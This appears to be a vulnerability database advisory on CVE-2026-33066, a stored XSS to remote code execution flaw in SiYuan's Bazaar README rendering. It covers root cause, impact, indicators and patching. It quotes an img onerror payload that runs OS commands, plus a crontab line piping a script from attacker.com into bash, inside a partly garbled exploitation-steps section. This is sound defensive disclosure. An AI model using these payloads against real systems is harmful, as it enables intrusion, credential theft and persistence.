
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33066 is a Stored XSS to Remote Code Execution (RCE) vulnerability in SiYuan's Bazaar (community marketplace) caused by unsanitized rendering of package README content. It affects SiYuan versions up to and including 3.5.9, and was disclosed on March 17, 2026, with a patch released in version 3.6.1. The vulnerability carries a CVSS v3.1 base score of 9.0 (Critical) per Feedly, with the official advisory citing 9.6 (Critical) (GitHub Advisory, SiYuan Advisory).
The root cause (CWE-79: Stored XSS) lies in two compounding flaws: the backend renderREADME function in kernel/bazaar/package.go instantiates the Lute Markdown engine via lute.New() without calling SetSanitize(true), allowing raw HTML in Markdown to pass through unmodified; and the frontend (app/src/config/bazaar.ts:607) assigns the returned HTML directly to innerHTML without client-side sanitization such as DOMPurify. Critically, SiYuan's Electron configuration (app/electron/main.js:422-426) sets nodeIntegration: true and contextIsolation: false, meaning any JavaScript executing in the renderer has direct access to Node.js APIs — escalating XSS to full OS-level RCE. Payloads can be embedded in numerous HTML elements (img, svg, details, picture, video, audio, iframe, object, embed, math, etc.), making detection during code review difficult (GitHub Advisory, SiYuan Advisory).
Successful exploitation grants an attacker full remote code execution on the victim's desktop system as the SiYuan application user, across Windows, macOS, and Linux. An attacker can steal SiYuan API tokens, application configuration, SSH keys, browser credentials, and arbitrary files, as well as install persistent backdoors (e.g., Windows scheduled tasks or Linux crontab entries). Because the attack is delivered via the official SiYuan Bazaar marketplace, it constitutes a supply-chain attack vector with broad reach to any user who browses and views a malicious package's details (SiYuan Advisory, GitHub Advisory).
A detailed proof-of-concept with step-by-step exploitation instructions is publicly available in the official security advisory, including concrete payload examples using img onerror, svg onload, and details ontoggle elements (SiYuan Advisory). Exploitation requires only that a victim user clicks to view the malicious package's details in the Bazaar — a single user interaction. The EPSS score is approximately 0.109% (29th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (GitHub Advisory). The vulnerability was reported by researcher 0xkakash1 and no threat actor attribution has been identified.
README.md using an HTML element such as <img src=x onerror="require('child_process').exec('calc.exe')"> — the Lute engine preserves raw HTML because SetSanitize(true) is not called.<details> element with an ontoggle handler (e.g., <details open ontoggle="...">) so it blends with real README content and fires without additional user interaction with the element.renderREADME() without sanitization and returns unsanitized HTML.innerHTML; the injected event handler fires. Because Electron runs with nodeIntegration: true and contextIsolation: false, the JavaScript payload has direct access to Node.js APIs and executes arbitrary OS commands.cmd.exe, powershell.exe, /bin/bash, curl, wget) executing commands not initiated by the user; calc.exe or other test binaries launched unexpectedly (PoC indicator).@reboot curl -s https://attacker.com/stage2.sh | bash) on Linux/macOS; new Windows scheduled tasks created by the SiYuan user account; unexpected scripts or executables written to the SiYuan data directory or temp folders./api/bazaar/getBazaarPackageREADME for recently added or unfamiliar packages; system logs recording new scheduled task or crontab creation events coinciding with Bazaar usage.Upgrade SiYuan to version 3.6.1 or later immediately, which applies the fix in commit b382f50e1880ed996364509de5a10a72d7409428 by adding luteEngine.SetSanitize(true) to the renderPackageREADME function (Patch Commit). As a temporary workaround, avoid browsing or installing packages from the Bazaar marketplace — particularly from unfamiliar or recently created sources — until patched. The advisory also recommends adding client-side sanitization via DOMPurify as defense-in-depth, and long-term hardening of the Electron configuration by setting nodeIntegration: false, contextIsolation: true, and sandbox: true (SiYuan Advisory).
The vulnerability was reported by security researcher 0xkakash1 and published to the GitHub Advisory Database on March 17–18, 2026. A technical write-up was published at infinitsec.net titled "SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering," highlighting the supply-chain attack angle. The CVE was also tracked by Bluesky CVE bots and aggregated by multiple vulnerability intelligence platforms shortly after disclosure (infinitsec.net, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."